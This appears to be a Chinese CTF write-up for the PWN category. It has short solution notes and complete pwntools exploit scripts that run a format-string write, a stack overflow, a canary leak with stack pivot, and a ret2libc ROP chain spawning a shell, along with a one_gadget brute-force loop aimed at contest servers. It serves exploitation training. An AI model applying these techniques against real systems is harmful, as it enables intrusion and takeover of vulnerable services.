PWN:
Test_Your_nc:
对程序进行逆向后nc输入指定字符串即可
How_2_getshell?:
限制输入长度且比较/bin/sh字符串,输入sh即可
bignum?:
输入-1即可绕过
Cr4zy_Thursday!!!:
64位格式化字符串任意地址写,注意对齐
exp:
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
# io=process("./pwn")
io=remote("101.42.30.15",8405)
# gdb.attach(io)
# pause()
flag_addr=0x060108C
payload="%{}c%{}$hhn".format(0x32,8).encode().ljust(0x10,b"\x00")+p64(flag_addr)
io.send(payload)
io.interactive()
Stack_Overflow:
64位栈溢出
exp:
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
# io=process("./pwn")
io=remote("101.42.30.15",8406)
# gdb.attach(io)
# pause()
payload=cyclic(0x28)+p64(0x400717)
io.sendafter(b"ght\n",payload)
io.interactive()
你喜欢金丝雀吗:
出题人的本意应该是好的,编译器执行的更好了
不同以往,程序最后结束的时候进入了另外一个分支:
loc_80486A5:
mov ecx, [ebp+var_4]
leave
lea esp, [ecx-4]
retn
; } // starts at 80485F9
main endp
通过格式化字符串获取canary和栈地址
获取canary后不能直接溢出写,需要通过控制栈上数据进一步控制寄存器
exp:
from pwn import *
context(log_level='debug',arch='x86',terminal=['tmux','splitw','-h'])
io=process("./pwn")
# io=remote("101.42.30.15",8407)
gdb.attach(io)
pause()
io.sendafter(b"you!!!!!\n",b"%15$p.%1$p".ljust(0x10,b"."))
canary=int(io.recv(10),16)
io.recvuntil(b".")
stack=int(io.recv(10),16)+0x10
print("canary: ",hex(canary))
print("stack: ",hex(stack))
payload=p32(0x80485e0)*8+p32(canary)+p32(stack)*3
io.send(payload)
io.interactive()
原神,启动!:
where_to_go可以往栈上读数据,可以布置rop链
dress可以实现栈上写8字节
一开始直接利用栈上写8字节特性修改ret地址低三字节,爆破半字节打one_gadget,1/16概率本地能出两个,远端开4个终端爆一晚上不通,改用rop的方式
总之多调试一下就行了,最后泄露后建议返回main函数,不然寄存器值更改后容易卡住
exp:
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h',])
# io=process("./ys")
io=remote("101.42.30.15",8408)
elf=ELF("./ys")
libc=ELF("./libc-2.23.so")
pop_rdi=0x4009b3
# gdb.attach(io)
# pause()
sleep(1)
io.recv()
sleep(1)
io.sendline(b"10086")
sleep(1)
io.recv()
sleep(1)
io.send(b"qqqqqqqqqqqqqqqqqq")
sleep(1)
io.recv()
sleep(1)
payload=p64(pop_rdi)+p64(elf.got[b"puts"])+p64(elf.plt[b"puts"])+p64(0x4008f3)
io.send(payload*5)
sleep(1)
io.recv()
sleep(1)
# gdb.attach(io)
# pause()
io.sendline(b"56") #88
sleep(1)
io.recv()
sleep(1)
io.send(p64(0x400589))
# sleep(1)
# io.recv()
# sleep(1)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-libc.sym[b"puts"]
print("leak_addr: "+hex(leak_addr))
sys_addr=leak_addr+libc.sym[b"system"]
str_sh=leak_addr+next(libc.search(b"/bin/sh"))
# gdb.attach(io)
# pause()
sleep(1)
io.recv()
sleep(1)
io.sendline(b"10086")
sleep(1)
io.recv()
sleep(1)
io.send(b"qqqqqqqqqqqqqqqqqq")
sleep(1)
io.recv()
sleep(1)
payload=p64(pop_rdi)+p64(str_sh)+p64(sys_addr)+p64(0)
io.send(payload*5)
sleep(1)
io.recv()
sleep(1)
io.sendline(b"56") #88
sleep(1)
io.recv()
sleep(1)
io.send(p64(0x400589))
io.interactive()
# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
# rax == NULL
# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
# [rsp+0x30] == NULL
# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
# [rsp+0x50] == NULL
# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
# Gadgets information
# ============================================================
# 0x00000000004009ac : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004009ae : pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004009b0 : pop r14 ; pop r15 ; ret
# 0x00000000004009b2 : pop r15 ; ret
# 0x00000000004009ab : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004009af : pop rbp ; pop r14 ; pop r15 ; ret
# 0x0000000000400670 : pop rbp ; ret
# 0x00000000004009b3 : pop rdi ; ret
# 0x00000000004009b1 : pop rsi ; pop r15 ; ret
# 0x00000000004009ad : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400589 : ret
# Unique gadgets found: 11
最后还是放一个爆破的脚本:
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h',])
while True:
try:
io=process("./ys")
# io=remote("101.42.30.15",8408)
elf=ELF("./ys")
libc=ELF("./libc-2.23.so")
# gdb.attach(io)
# pause()
sleep(0.5)
io.recv()
# sleep(1)
io.sendline(b"10086")
sleep(0.5)
io.recv()
# sleep(1)
io.sendline(b"1")
sleep(0.5)
io.recv()
# sleep(1)
io.sendline(b"88")
# sleep(1)
io.recv()
# sleep(1)
# sleep(2)
io.send(b"\x47\x12\x8f")
sleep(2)
io.sendline("ls")
sleep(2)
ret = io.recv()
if b"flag" in ret:
io.sendline("cat flag")
sleep(1)
print(io.recv())
print("SUCCEED")
sys.exit(0)
else:
print("FAILED")
io.close()
except:
io.close()
continue
# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
# rax == NULL
# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
# [rsp+0x30] == NULL
# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
# [rsp+0x50] == NULL
# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL